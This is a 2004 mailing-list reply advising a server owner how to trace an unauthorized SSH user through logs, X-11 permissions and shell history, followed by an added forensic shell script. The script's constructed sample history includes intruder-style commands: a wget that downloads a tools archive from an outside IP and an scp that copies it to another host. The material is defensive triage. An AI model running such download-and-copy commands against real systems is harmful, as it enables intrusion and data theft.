[Coco] Re: Not sure about the Barden issue

John E. Malmberg wb8tyw at qsl.net
Wed Jul 28 20:03:45 EDT 2004


Boisy G. Pitre wrote:
> John,
> 
> There was no hacking going on at all.

I was referring to hacking in the generic sense, as any unauthorized use 
of your server.

> The system log shows a normal login through SSH that would not have
> raised any flags with me whatsoever.

Does that log show the originating IP address?

> Since this fiasco, my machine has locked up repeatedly and I am 
> currently looking at it to figure out if (a) the same individual placed 
> some type of rogue application on the server

Assuming that the account given out was not privileged, there should be 
limited places that it can put such an application.

> or (b) someone from this group is targeting my IP address as a means of
> revenge.  So if anyone on this list is taking advantage of this situation
> by attempting to raze my system, please stop.  My attempts to provide a
> service to CoCo folks are providing me more grief than it's worth, 
> frankly.

On Monday at least one new worm came out, and it is attacking many 
systems.  Even if your system is not vulnerable to infection, the 
traffic alone on your network segment can cause problems.

I would be surprised if someone was specifically targeting you, as I 
recall only seeing helpful posts from you, never anything controversial.

I have seen small UNIX systems overwhelmed to the point of being 
shut down just from the default I/O buffer allocations being exhausted 
by similar network activity.  Usually that can be fixed with tuning. 
In the case of that specific UNIX system, I had to run a script that 
rebuilt the kernel.

Not having specific knowledge of Linux, I do not know how to check for 
such things on it.

As I stated before, if your configuration allows you to direct the X-11 
output of other computers to yours, the former security settings 
available to X-11 allowed those remote computers to slave your keyboard, 
mouse, and screen without any visible indication, which means that any 
user of those computers could have had access to anything that was 
displayed on your screen or typed in at the keyboard.  So checking your 
X-11 access permissions may be needed.

For some X-11 configurations, the default is wide open unless you 
implement restrictions.  For the current SUSE distribution, it appears 
to be locked down.

Since the Hotmail server indicated that HTTP access was used, I sent to 
your gmane-munged address some further places to look for things that 
the person may have left behind without realizing it.  Gmane claims 
that it sent the message.

If they displayed an X-11 GUI application back to their computer, its 
IP address may also be in one of the data files, particularly in 
.history.

-John
wb8tyw(at)qsl.net
Personal Opinion Only
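The two checks the mail suggests (which source addresses actually logged in over SSH, and which addresses a left-behind shell history mentions) can be scripted. The following is an added example and not part of the original post or any tool the poster used; the log lines, history lines and temporary file names are constructed for the example, and the functions would be pointed at the real sshd log (commonly /var/log/auth.log or /var/log/secure, an assumption about the distribution) and the account's ~/.bash_history on a real machine.

```shell
#!/bin/sh
# Added example, not part of the original mailing-list post: triage helpers
# for two checks the mail suggests, namely which source IPs actually logged
# in over SSH, and which IPs a left-behind shell history mentions.
# All log and history content below is constructed for the example.
set -u

# Constructed sshd log lines in the syslog format OpenSSH writes.
SAMPLE_AUTH_LOG=$(mktemp)
cat > "$SAMPLE_AUTH_LOG" <<'EOF'
Jul 26 02:14:07 host sshd[4121]: Accepted password for cocouser from 203.0.113.45 port 51522 ssh2
Jul 26 02:14:09 host sshd[4121]: pam_unix(sshd:session): session opened for user cocouser by (uid=0)
Jul 26 09:03:11 host sshd[4402]: Failed password for root from 198.51.100.7 port 40011 ssh2
Jul 27 22:41:50 host sshd[5190]: Accepted publickey for boisy from 192.0.2.10 port 3301 ssh2
Jul 28 01:07:33 host sshd[5301]: Accepted password for cocouser from 203.0.113.45 port 51900 ssh2
EOF

# Constructed shell history of the kind the mail says may hold the
# intruder's address, e.g. a DISPLAY pointed back at their own machine.
SAMPLE_HISTORY=$(mktemp)
cat > "$SAMPLE_HISTORY" <<'EOF'
ls -la
export DISPLAY=203.0.113.45:0.0
xterm &
wget http://198.51.100.7/tools.tgz
scp tools.tgz 203.0.113.45:/tmp/
EOF
trap 'rm -f "$SAMPLE_AUTH_LOG" "$SAMPLE_HISTORY"' EXIT

# ssh_login_ips LOGFILE
# Prints "user ip count" for each successful login ("Accepted ..." lines),
# so failed guesses from scanners do not clutter the answer to "who got in".
ssh_login_ips() {
    awk '/sshd\[[0-9]+\]: Accepted / {
             key = $9 " " $11           # user, source address
             count[key]++
         }
         END { for (k in count) print k, count[k] }' "$1" | sort
}

# history_ips FILE
# Prints "ip count" for every dotted-quad address found in FILE, most
# frequent first. Catches DISPLAY settings, scp/wget targets and so on.
history_ips() {
    grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' "$1" \
        | sort | uniq -c | sort -rn | awk '{ print $2, $1 }'
}

# shared_ips LOGFILE HISTORYFILE
# Addresses that both logged in over SSH and appear in the history file:
# the strongest single hint about where the unwanted session came from.
shared_ips() {
    a=$(mktemp); b=$(mktemp)
    ssh_login_ips "$1" | awk '{ print $2 }' | sort -u > "$a"
    history_ips "$2" | awk '{ print $1 }' | sort -u > "$b"
    comm -12 "$a" "$b"
    rm -f "$a" "$b"
}

printf 'Successful SSH logins (user ip count):\n'
ssh_login_ips "$SAMPLE_AUTH_LOG"
printf '\nAddresses in shell history (ip count):\n'
history_ips "$SAMPLE_HISTORY"
printf '\nAddresses in both:\n'
shared_ips "$SAMPLE_AUTH_LOG" "$SAMPLE_HISTORY"
```

On the sample data the script reports two successful logins, the repeated address 203.0.113.45 in the history, and that same address as the one present in both lists. For the X-11 side of the mail, running `xhost` with no arguments on the console prints whether access control is enabled and which hosts are currently allowed, and `xhost -` turns access control back on if it has been disabled.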
